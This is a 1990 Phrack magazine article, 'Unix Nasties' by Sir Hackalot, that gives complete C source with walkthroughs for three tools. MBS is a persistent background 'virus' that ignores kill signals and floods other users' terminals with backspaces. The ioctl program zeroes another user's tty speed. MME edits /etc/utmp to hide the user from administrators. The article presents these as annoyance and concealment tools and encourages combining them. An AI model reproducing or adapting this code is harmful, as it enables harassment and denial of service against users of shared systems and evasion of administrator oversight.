[ News ] [ Paper Feed ] [ Issues ] [ Authors ] [ Archives ] [ Contact ]


..[ Phrack Magazine ]..
.:: Unix 'Nasties' ::.

Issues: [ 1 ] [ 2 ] [ 3 ] [ 4 ] [ 5 ] [ 6 ] [ 7 ] [ 8 ] [ 9 ] [ 10 ] [ 11 ] [ 12 ] [ 13 ] [ 14 ] [ 15 ] [ 16 ] [ 17 ] [ 18 ] [ 19 ] [ 20 ] [ 21 ] [ 22 ] [ 23 ] [ 24 ] [ 25 ] [ 26 ] [ 27 ] [ 28 ] [ 29 ] [ 30 ] [ 31 ] [ 32 ] [ 33 ] [ 34 ] [ 35 ] [ 36 ] [ 37 ] [ 38 ] [ 39 ] [ 40 ] [ 41 ] [ 42 ] [ 43 ] [ 44 ] [ 45 ] [ 46 ] [ 47 ] [ 48 ] [ 49 ] [ 50 ] [ 51 ] [ 52 ] [ 53 ] [ 54 ] [ 55 ] [ 56 ] [ 57 ] [ 58 ] [ 59 ] [ 60 ] [ 61 ] [ 62 ] [ 63 ] [ 64 ] [ 65 ] [ 66 ] [ 67 ] [ 68 ] [ 69 ] [ 70 ]
Current issue : #32 | Release date : 1990-11-17 | Editor : Crimson Death
Phrack Classic XXXII IndexCrimson Death
Phrack Classic Spotlight featuring Knight LightningCrimson Death & Knight Lightning
Concerning Hackers Who Break Into Computer SystemsDorthy Denning
The Art of InvestigationThe Butler
Unix 'Nasties'Sir Hackalot
Automatic Teller Machine CardsJester Sluggo
A Trip to the NCSCKnight Lightning
Inside the SYSUAF.DAT FilePain Hertz
RSTSCrimson Death
Knight Line I Part 1Doc Holiday
Knight Line I Part 2Doc Holiday
Knight Line I Part 3Doc Holiday
Title : Unix 'Nasties'
Author : Sir Hackalot
                              ==Phrack Classic==

                     Volume Three, Issue 32, File #5 of 12


        *%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*
        %P                                                           P%
        %H                  C UNIX `nasties' PART I                  H%
        %A                            by                             A%
        %Z             Sir Hackalot of PHAZE (10/20/90)              Z%
        %E                                                           E%
        *%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*


o Purpose of this file:

        The purpose of this file is to share small C programs for the Unix
        System V and/or BSD 4.3 operating systems which as in logical terms,
        "Nasty".  This "Nasty" can be termed better as Annoyance programs
        or tricky programs.

        The purpose of this text however, is NOT to teach one how to program
        in C and or how to use the C compiler on Unix systems.  This textfile
        assumes you have a working knowledge of programming with C in the
        UNIX environment.



o The UTMP Reader:
  ~~~~~~~~~~~~~~~~

        First, I would like to start this text off by posting in a generic
        /etc/utmp reader.  The /etc/utmp reader is essential for applications
        that deal with all the users online at a given time.

        Here is the source:

- - - - - - - - - - - - - - - - - -CUT-HERE- - - - - - - - - - - - - - - - - -


/* WhatTTY -- Generic WHO
UTMP Reader "Skeleton" : By Sir Hackalot / PhaZe

This is basically a skeleton program that is just a base for any UTMP
operations.

This is the skeleton that PhaZe(soft) uses for anything that deals
with reading the utmp file, such as MBS, SEND, VW, MME, and other
utilities.

Applications: You can use this when you need to do something to
everyone online, or when you need some sort of data from utmp, wtmp
or any file that is like utmp.
*/

#include <stdio.h>
#include <sys/types.h> /* This is the key to the whole thing */
#include <utmp.h>
#include <fcntl.h>


main()
{
        int handle;
        char *etc = "/etc/utmp";
        struct utmp user;

        handle = open(etc,O_RDONLY);

        while(read(handle,&user,sizeof(user)) != 0) {
                if (user.ut_type == USER_PROCESS)
                printf("%s is on %s\n",user.ut_name,user.ut_line);
        }
        close(handle);

/* Simple, Right? */
/* To see anything that is waiting for a login, change USER_PROCESS
to LOGIN_PROCESS */
}

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

        In the above program, this is what happens:
        1.  I assigned the variable "etc" to point at the string
                "/etc/utmp", which is the utmp file.
        2.  I opened in in Read ONLY mode (O_RDONLY).
        3.  I started a loop that does not end until 0 bytes are
            read into the user structure.  The 0 bytes would mean
            end of file.

        Notice the line:
        if (user.ut_type == USER_PROCESS)

        What the above line does is to distinguish between a user
        and a terminal waiting for a Login.  The ut_type is defined
        in utmp.h.  There are many types.  One of them is LOGIN_PROCESS.
        That will be a terminal waiting for a login.  If you wanted to see
        all the TTYs waiting to be logged in on, you would change the
        USER_PROCESS to LOGIN_PROCESS.  Other types are things like
        INIT_PROCESS.  You can just look in utmp.h to see them.

        Also notice that I have inclide "sys/types.h".  If you do not include
        this file, there will be an error in utmp.h, and other headers.
        types.h has definitions for other TYPES of data, etc.  So, if in
        a header file you encounter a syntax error, you might need to include
        sys/types.h

        This program is just a skeleton, although it does print out who
        is logged on, and to what TTY they are on.  You will see how this
        skeleton I wrote can be used.  I used it to write MBS.

_______________________________________________________________________________


o MBS -- Mass BackSpace virus:
  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

        MBS may not be considered a virus, since it does not replicate
        itself.  However, it does "infect" every user that logs in, provided
        the conditions are right.

        The MBS virus uses the utmp reader to constantly read the utmp
        file to find its next victim. Thus, eventually getting everyone, then
        recycling to start again. Therefore catching people who login after
        it is started.

        Lets look at the source:

- - - - - - - - - - - - - - - - - -CUT-HERE- - - - - - - - - - - - - - - - - -

#include <stdio.h>
#include <sys/types.h>
#include <utmp.h>
#include <fcntl.h>
#include <signal.h>
/*
   MBS - Mass BackSpace Virus!! v2.2 Deluxe+
   (c) 1990 - Sir Hackalot
   PhaZeSOFT Ltd.

*/

char *ent[10][100]; /* This supports 10 immune people change 10 to x for more */
int maxitem = 5; /* Should be total # of immune dudes */
int truefalse = 0;
int warn[10],bad;
char full_tty[15], text[160],  kstr[80];
FILE *to_tty, *strm;
struct utmp u;


void kmes(fmt,boo)
char *fmt;
int boo;
{
        if (boo != 0) {
                printf("MBS_KERN: ");
                printf("%s",fmt);
        }
        if (boo == 0) {
                sprintf(full_tty,"/dev/%s",u.ut_line);
                to_tty = fopen(full_tty,"w");
                fprintf(to_tty,"MBS_KERN: %s",fmt);
                fclose(to_tty);
        }
}

void initit() {  /* Initialize our little "kernel" */
        int xxx = 0;
        strcpy(ent[0],"technic");
        strcpy(ent[1],"merlin");
        strcpy(ent[2],"datawiz");
        strcpy(ent[3],"par");
        strcpy(ent[4],"Epsilon");
        while (xxx < 11) {
                warn[xxx] = 0;
                xxx++;
        }
        kmes("Kernel Started.\n",1);
}

void warnem(wcnt) /* Notify all the immune people ... */
int wcnt;
{
        if (bad == 0) { /* keep from dumping core to disk */
                if (warn[wcnt] < 2) {
                        sprintf(kstr,"%s has started a backspace virus!\n",getlo
                        kmes(kstr,0);
                        warn[wcnt]++;
                }
        }
}


int checkent(uname) /* Check for immunity */
char *uname;
{
        int cnt = 0;
        truefalse = 0; /* assume NOT immune */
        while (cnt < maxitem) {
                if (strcmp(uname,ent[cnt]) == 0) { /* if immune... */
                        truefalse = 1;
                        warn[cnt]++; /* increment warning variable */
                        warnem(cnt); /* warn him if we have not */
                }

                cnt++;
        }
        return(truefalse); /* return immunity stat. 1=immune, 0 = not */
}


/* Purpose: Instead of just ignoring the signal via SIG_IGN, we want
to intercept it, and notify use */
void sig_hand(sig)
int sig;
{
if(sig == 3) kmes("Ignoring Interrupt\n",1);
if(sig == 15) kmes("Ignoring Termination Signal\n",1);
if(sig == 4) kmes("Ignoring quit signal.\n",1);
        }

main(argc,argv)
int argc;
char *argv[];

{
        int prio,pid,isg,handle;
        char buf[80];
        char name[20],tty[20],time[20];
        initit();
        if (argc < 2) prio = 20;
        if (argc == 2) prio = atoi(argv[1]);
        if ((pid = fork()) > 0) {
        printf("Welcome to MBS 2.2 Deluxe, By Sir Hackalot [PHAZE]\n");
                printf("Another Fine PhaZeSOFT production\n");
                printf("Thanks to The DataWizard for Testing this\n");
                printf("Hello to The Conflict\n");
                sprintf(kstr,"Created Process %s (%d)\n\n",argv[0],pid);
                kmes(kstr,1);
                exit(0); /* KILL MOTHER PID, return to Shell & go background */
        }
        nice(prio);
        signal(SIGQUIT,sig_hand);
        signal(SIGINT,sig_hand);
        signal(SIGTERM,sig_hand);
        /* That makes sure you HAVE to do a -9 or -10 to kill this thing.
           Sometimes, hitting control-c will kill of background processes!
           Add this line if you want it to continue after you hangup:
           signal(SIGHUP,SIG_IGN);
doing it will have the same effect as using NOHUP to
to execute it. Get it? Nohup = no SIGHUP
*/
        while(1) {  /* "Kernel" Begins here and never ends */
                handle = open("/etc/utmp",O_RDONLY);
                while (read(handle,&u,sizeof(u)) != 0) {
                        bad = 0;
                        sprintf(full_tty,"/dev/%s",u.ut_line);
                        if (strcmp(u.ut_name,getlogin()) != 0) {

         /* Fix: Below is a line that optimizes the hosing/immune process
            It skips the utmp entry if it is not a user.  If it is, it
            checks for immunity, then comes back. This is alot faster
            and does not wear down cpu time/power */

               if (u.ut_type == USER_PROCESS) isg = checkent(u.ut_name);
               else isg = 1;
                 if (isg != 1) {
                                        if((to_tty = fopen(full_tty,"w")) == NUL
                                                bad = 1;
                                        }
                                        if (bad == 0) {
                                                fprintf (to_tty, "\b\b\b");
                                                fflush (to_tty);
                                        }
                                        fclose(to_tty);
                                }
                        }
                }
                close (handle);
        }
}

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

        I am going to try to take this bit by bit and explain how it works
        so that maybe you can come up with some good ideas on creating
        something similar.

        I will start with the MAIN function.  Here it is:

___

main(argc,argv)
int argc;
char *argv[];

{
        int prio,pid,isg,handle;
        char buf[80];
        char name[20],tty[20],time[20];
        initit();
___

        Obviously, this is the part of the code which initializes the main
        variables used.  The "main(argc,argv)" is there so it can accept
        command line parameters.  The command line parameters are just
        for speed customization, which I will discuss later.  Notice how
        the variables are defined for the command line parameters:

        int argc, char *argv[];

        argc is the number of arguments, INCLUDING the name of the current
        executable running.  argv[] holds the strings in an array which make
        up the parameters passed.  argv[0] holds the name of the program,
        while argv[1] holds the 1st parameter entered on the command line.
        initit() is called to set up the necessary tables.  All of
        the variables defined at the top of the program are global, and alot
        of these functions use the global variables, as does initit();.

___

if (argc < 2) prio = 20;
if (argc == 2) prio = atoi(argv[1]);
___

        Ok, the above two lines essentially parse the command line.
        The MBS program only accepts ONE argument, which is the priority
        value to add to the normal process priority.  This is so you
        can customize how fast MBS runs.  If you want to burn CPU time,
        you would invoke mbs by:
        $ mbs 0

        That would make the priority as fast as the current can run something.
        MBS's default priority setting is 20, so that CPU time will be saved.
        MBS is very fast however, and since alot of Unix systems like to
        cache alot of frequently used data from disks, it gets fast after
        it reads utmp a few times, since utmp will be cached until it changes.
        However, you can run MBS with a number from 0-19, the higher the
        number, the "less" priority it will have with the cpu.


___

if ((pid = fork()) > 0) {
  printf("Welcome to MBS 2.2 Deluxe, By Sir Hackalot [PHAZE]\n");
  printf("Another Fine PhaZeSOFT production\n");
  sprintf(kstr,"Created Process %s (%d)\n\n",argv[0],pid);
  kmes(kstr,1);
  exit(0); /* KILL MOTHER PID, return to Shell & go background */
}

___

        The above is what sends MBS into the background.  It calls fork(),
        which creates another process off the old one.  However, fork()
        can be considered "cloning" a process, since it will use anything
        beneath it.  So, now you can assume there are TWO copies of MBS
        running -- One in the foreground, and one in the background.  However,
        you may notice the exit(0).  That first exit kills off the parent.
        a second call to exit() would kill the child as well.  notice the
        call to "kmes".  kmes is just a function that is defined earlier,
        which I will discuss later.
___

nice(prio);
signal(SIGQUIT,sig_hand);
signal(SIGINT,sig_hand);
signal(SIGTERM,sig_hand);
/*   signal(SIGHUP,SIG_IGN); */
___

        The above code is integral for the survival of the MBS program in
        memory.  The nice(prio) is what sets the new priority determined
        by the command line parsing.

        The signal() statements are basically what keeps MBS running.  What
        it does is catch INTERRUPTS, Quits, and a regular call to KILL.
        the commented out portion would ignore requests to kill upon hangup.
        This would keep MBS in the background after you logged off.

        Why do this?  Well, remember that the parent was affected by
        its environment?  Well, the new forked process is too.  That means,
        if you were 'cat'ting a file, and hit control-C to stop it, the
        cat process would stop, but push the signal on to MBS, which would
        cause MBS to exit, if it did not have a signal handler.  The signal
        calls setup signal handlers.  What they do is tell the program
        to goto the function sig_hand() when one of the 3 signals is
        encountered.  The commented signal just tells the program to ignore
        the hangup signal.  The sig_hand argument can be replaced with
        SIG_IGN if you just want to plain ignore the signal and not handle it.

        The SIGQUIT is sometimes the control-D character.  That is why it
        also must be dealt with.  If the signals aren't ignored or caught,
        MBS can easily kicked out of memory by YOU, by accident of course.

___

while(1) {  /* "Kernel" Begins here and never ends */
     handle = open("/etc/utmp",O_RDONLY);
___

        The above starts the main loop.  The begining of the loop is to open
        the utmp file.

___

 while (read(handle,&u,sizeof(u)) != 0) {
      bad = 0;
      sprintf(full_tty,"/dev/%s",u.ut_line);
      if (strcmp(u.ut_name,getlogin()) != 0) {
        if (u.ut_type == USER_PROCESS) isg = checkent(u.ut_name);
           else isg = 1;
        if (isg != 1) {
           if((to_tty = fopen(full_tty,"w")) == NULL)  {
              bad = 1;
              }
           if (bad == 0) {
              fprintf (to_tty, "\b\b\b");
              fflush (to_tty);
              }
              fclose(to_tty);
        }
    }
___


        Above is the sub_main loop.  what it does is go through the utmp
        file, and on each entry, it prepares a path name to the TTY
        of the current utmp entry (sprintf(fulltty...)).  Then it checks
        to see if it is YOU.  If it is, the loop ends.  If it is not, then
        it sees if it is a User.   If not, it ends the loop and goes to
        the next.

        If it is a user, it goes to checkent to see if that user has been
        declared immune in the immunity tables (down below later..).
        If the idiot is not immune, it attempts to open their tty.  If it
        cannot, it sets the bad flag, then ends the loop.  If it can be
        written to, it sends three backspaces, according to YOUR tty specs.
        Then, it closes the opened tty, and the loop continues until the end.

___

       }
close (handle);
    }
}

___

        The above is the end of the main loop.  It closes handle (utmp) so
        it can be reopened at the start of the loop at the beginning of the
        file.  The reason to not create a table of people to hit in memory
        after one reading is so that MBS will stop after people logoff, and
        to start when new ones logon.  The constant reading of the utmp
        file makes sure everyone gets hit, except immune people.  Also,
        the file must be closed before reopening, or else, after a few opens,
        things will go to hell.


Here is the signal handler:

___

void sig_hand(sig)
int sig;
{
if(sig == 3) kmes("Ignoring Interrupt\n",1);
if(sig == 15) kmes("Ignoring Termination Signal\n",1);
if(sig == 4) kmes("Ignoring quit signal.\n",1);
        }
___

        It is very simple.  when a signal is caught and sent to the handler,
        the library function SIGNAL sends the signal number as an argument
        to the function.  The ones handled here are 3,4, and 15.  But
        this was just for effect.  You could just have it print one line
        no matter what the signal was, or just rip this function out and
        put in SIG_IGN in the signal calls.

        Below is the immunity check:
___

int checkent(uname) /* Check for immunity */
char *uname;
{
        int cnt = 0;
        truefalse = 0; /* assume NOT immune */
        while (cnt < maxitem) {
                if (strcmp(uname,ent[cnt]) == 0) { /* if immune... */
                        truefalse = 1;
                        warn[cnt]++; /* increment warning variable */
                        warnem(cnt); /* warn him if we have not */
                }

                cnt++;
        }
        return(truefalse); /* return immunity stat. 1=immune, 0 = not */
}

___

        Above, you see variables used that are not defined.  They are
        just variables that were declared as globals at the begining.
        What this does is just compare the login name sent to it with
        every name in the immunity table.  If it finds the name on
        the table matches, it will go and see if it should warn the
        user.  Also, the warn count is incremented so that the warning
        function will know if the user has been warned.

        Here is the warning function:

___

void warnem(wcnt) /* Notify all the immune people ... */
int wcnt;
{
        if (bad == 0) { /* keep from dumping core to disk */
                if (warn[wcnt] < 2) {
                        sprintf(kstr,"%s has started a backspace virus!\n",getlo
                        kmes(kstr,0);
                        warn[wcnt]++;
                }
        }
}
___

        What this does is take the position number of the table entry and
        checks and see if that entry has been warned before.  It decides
        this by checking its value.  If it is less than two, that means
        the user had not been warned.  After it is sent, the function
        incrememnts the warning flag so that they will never been warned
        again until the program has stopped & restarted or someone else
        runs one.  The "if (bad == 0)" is there so that it only warns a
        person if it can write to the tty.

        Here is the kmes function you keep seeing:

___

void kmes(fmt,boo)
char *fmt;
int boo;
{
        if (boo != 0) {
                printf("MBS_KERN: ");
                printf("%s",fmt);
        }
        if (boo == 0) {
                sprintf(full_tty,"/dev/%s",u.ut_line);
                to_tty = fopen(full_tty,"w");
                fprintf(to_tty,"MBS_KERN: %s",fmt);
                fclose(to_tty);
        }
}
___
        All this is, is a fancy printf which prints a string with
        "MBS_KERN:" stuck on the front of it.  the BOO variable is just
        so it can determine whether or not to send it to the local
        screen or to another tty.  It is just for looks.

        Now, finally, we can look at the initializer:

___

void initit() {  /* Initialize our little "kernel" */
        int xxx = 0;
        strcpy(ent[0],"sirh");
        strcpy(ent[1],"merlin");
        strcpy(ent[2],"datawiz");
        strcpy(ent[3],"par");
        strcpy(ent[4],"epsilon");
        while (xxx < 11) {
                warn[xxx] = 0;
                xxx++;
        }
        kmes("Kernel Started.\n",1);
}
___

        This is a very SIMPLE procedure.  It just fills the list
        with the people to keep immune.  ent[..][..] is what holds
        the immune list.  It also zeros out the warning flags associated
        with each user.  ("sirh","merlin","par",etc. are acct. names)

        This "virus" can do more than just send backspaces if you want it
        to, but it will take modification.  Some people have modified
        it to include the next program, which is ioctl.c.

_______________________________________________________________________________



o IOCTL -- Set another's tty w/out read perms
  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

        The program ioctl is very very nice.  What it does is basically
        act like stty, but you don't have to use the < to change
        someone else's terminal.  Here is the listing:

- - - - - - - - - - - - - - - - - -CUT-HERE- - - - - - - - - - - - - - - - - -

#include <stdio.h>
#include <sys/types.h>
#include <fcntl.h>
#include <sgtty.h>
#define TIOC ('T'<<8)
#define TCSETA (TIOC|2)

main(argc,argv)
int argc;
char *argv[];
{
        int x;
        struct sgttyb histty;
        if (argc == 1) exit(0);
        x = open(argv[1],O_WRONLY);
        if (x == -1) exit(0);
        histty.sg_ispeed = B0;
        histty.sg_ospeed = B0;
        ioctl(x,TCSETA,&histty);
}

- - - - - - - - - - - - - - - - - -CUT-HERE- - - - - - - - - - - - - - - - - -

        The basis of the program is that you give a full path to the tty
        to nail.  You need to be able to write to the tty for it to work.

        Notice the two defines.  They are in there so you do not have
        to include termio.h, and hence get 200 warnings of redefinition.
        This program is WAY simpler than MBS, but here is how it works:

___

main(argc,argv)
int argc;
char *argv[];
___

        Of course, the above sets up the program to get command line
        arguments.

___

        int x;
        struct sgttyb histty;
___

        These are the variables.  the sgttyb structure is what the ioctl
        function call needs to do its duty.  You can do a lot to a tty
        using the structure, but this program only does 2 things to the
        tty, as you shall soon see.  Remember that the programs here can
        be modified, especially this one.  Just check out sgtty.h to
        see the modes you can pop a tty into.

___

        if (argc == 1) exit(0);
        x = open(argv[1],O_WRONLY);
        if (x == -1) exit(0);
___

        The above three lines are the open/error checks.  The 1st line
        says that if the idiot did not give an argument then exit
        the program.  The argument needs to be the path to the
        device driver (/dev/tty...).
        The second line opens the tty for writing, and the third exits
        upon error.

___

        histty.sg_ispeed = B0;
        histty.sg_ospeed = B0;
        ioctl(x,TCSETA,&histty);
___

        The above three lines are the meat of the program.  What they
        do is this:

        Line 1 sets the input speed to 0 for the tty into the structure.
        line 2 sets the output speed to 0 for the tty into the structure.
        line 3 sets the tty according to the structure histty.

        That is why if you look into the components of the structure, you can
        do things, such as convert all output to uppercase for them,
        set a higher baud, redefine CR mapping, redefine tabs, and
        all sorts of things.

_______________________________________________________________________________


o MME - Make ME!:
  ~~~~~~~~~~~~~~~
        MME is just a program which changes utmp for you, in order to hide
        you, or just mess with other user's minds.  This is a different
        version then the one I originally put out.  In this version,
        I removed the code that lets you change your tty.  It just became
        too dangerous to change your tty.

        Here is the listing:

- - - - - - - - - - - - - - - - - -CUT-HERE- - - - - - - - - - - - - - - - - -

#include <stdio.h>
#include <fcntl.h>
#include <sys/types.h>
#include <utmp.h>
#include <sys/stat.h>

char *mytty; /* For an exact match of ut_line */
char *backup_utmp = "cp /etc/utmp /tmp/utmp.bak";
struct utmp *user;

main(argc,argv)
int argc;
char *argv[];
{
        int good= 0,cnt = 0,start = 1, index = 0;
        char err[80];
        system(backup_utmp);
    printf("Welcome to MME 1.00 By Sir Hackalot\n");
    printf("Another PHAZESOFT Production\n");
    printf("Status:");
    if (argc == 2) printf("Changing your login to %s\n",argv[1]);
        if (argc == 1) printf("Removing you from utmp\n");

        utmpname("/etc/utmp");
        mytty = strrchr(ttyname(0),'/'); /* Goto the last "/" */
        strcpy(mytty,++mytty); /* Make a string starting one pos greater */
        while (good != 1) {
                user = getutent();
                cnt++;
                if (strcmp(user->ut_line,mytty) == 0) good =1;
        }
        utmpname("/etc/utmp"); /* Reset file pointer */
        for(start = 0;start < cnt;start++) {
                user = getutent(); /* Move the file pointer to where we are */
        }


    if (argc == 1) {
     user->ut_type = LOGIN_PROCESS;
         strcpy(user->ut_name,"LOGIN");
                   }
    else user->ut_type = USER_PROCESS;

        if (argc == 2) strcpy(user->ut_name,argv[1]);
        pututline(user); /* Rewrite our new info */
        endutent(); /* Tell the utmp functions we are through */
        printf("Delete /tmp/utmp.bak if all is well.\n");
        printf("Else, copy it to /etc/utmp.\n");
}

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -


        Well, of course, we will take this bit by bit.
        Lets start with the standard ole function:

___

main(argc,argv)
int argc;
char *argv[];
___

        This again sets up main so we can accept command line arguments.

___

char *mytty; /* For an exact match of ut_line */
char *backup_utmp = "cp /etc/utmp /tmp/utmp.bak";
struct utmp *user;
___

        These are just global variables.
        Backup_utmp is the command we will issue to shell for a failsafe
        mechanism.

___

           system(backup_utmp);
    printf("Welcome to MME 1.00 By Sir Hackalot\n");
    printf("Another PHAZESOFT Production\n");
    printf("Status:");
    if (argc >= 2) printf("Changing your login to %s\n",argv[1]);
        if (argc == 1) printf("Removing you from utmp\n");
___

        The above is not hard to figure out.  First, this uses the system
        command to load shell, and execute our backup command.
        Then, the lame credits are printed.  Then, it tells you what it
        is going to do based on the number of arguments passed from the
        command line.
        If no arguments are given (argc==1) then remove us from utmp.
        If there are 1 or more (arc>=2) then change the login name.

___

utmpname("/etc/utmp");
        mytty = strrchr(ttyname(0),'/'); /* Goto the last "/" */
        strcpy(mytty,++mytty); /* Make a string starting one pos greater */
___

        The above code does the following:  utmpname is a system function
        common to UNIX system V, XENIX system V, etc.  It is part of the
        utmp reading library.  It sets the thing to be read when the
        other system calls are made (getutent, etc..).
        mytty is set to hold one's tty.  It has to break down the result
        of ttyname(0) to get a ttyname without a path.

___

while (good != 1) {
                user = getutent();
                cnt++;
                if (strcmp(user->ut_line,mytty) == 0) good =1;
        }
___


        This code gets your relative index from utmp and stores it into
        cnt.

___

utmpname("/etc/utmp"); /* Reset file pointer */
        for(start = 0;start < cnt;start++) {
                user = getutent(); /* Move the file pointer to where we are */
        }
___

        The above resets the file pointer used by the system calls, then
        moves to your entry.

___

if (argc == 1) {
     user->ut_type = LOGIN_PROCESS;
         strcpy(user->ut_name,"LOGIN");
                   }
    else user->ut_type = USER_PROCESS;

        if (argc == 2) strcpy(user->ut_name,argv[1]);
        pututline(user); /* Rewrite our new info */
        endutent(); /* Tell the utmp functions we are through */
___

        The above is very simple as well.  If you are removing yourself
        from utmp, it will change your process type to LOGIN_PROCESS
        so that when someone does a "who", you are not there.
        It changes your login name to LOGIN so if some knowitall
        system admin does a who -l, he wont see you.  See, who -l shows
        ttys waiting for login.  SO, if i did not change your tty name,
        we would see:

        $ who -l
        LOGIN           ttyxx1
        LOGIN           tty002
        joehack         tty003
        LOGIN           tty004

        See the problem there?  That is why your name needs to be
        changed to LOGIN.
        If you are changing your login name, the "else" statment kicks
        in and makes SURE you WILL show up in utmp, in case you had
        removed yourself before.
        Then, it takes the command line argument, and places it as your
        login name in utmp.
        pututline(user) then writes the info into the record where the
        file pointer is... and that is your record.  It puts the contents
        of the things in the "user" structure into the file.  then, endutent
        closes the file.

        Now, here is an example of using the file:

        # mme Gh0d

        that would change your login name to Gh0d in utmp.

        # mme

        that would remove you from sight.  Remember!!: You need write perms
        to utmp for this to work.  You CAN test this program by changing
        the filename in the function "utmpname" to somewhere else, say in
        /tmp.  You could copy /etc/utmp to /tmp/utmp, and test it there.
        Then, you could use "who" to read the file in /tmp to show the
        results.

_______________________________________________________________________________


o In Conclusion:
  ~~~~~~~~~~~~~~

        These are just some of the programs I decided to put in this file.
        I have a lot more, but I decided I would keep them for later
        issues, and leave these two together since they can
        be easily related.  One person took MBS, and ioctl, and mended
        them together to make a program that sets everyone's baud
        rate to zero instead of sending 3 backspaces.  They just put
        in the above lines of code into the place where they sent
        the backspaces, and used open instead of stream open (fopen).
        It is very simple to mend these two things together.

        Have a nice life!  Keep on programmin'!

        By: Sir Hackalot of Phaze.
_______________________________________________________________________________
[ News ] [ Paper Feed ] [ Issues ] [ Authors ] [ Archives ] [ Contact ]
© Copyleft 1985-2021, Phrack Magazine.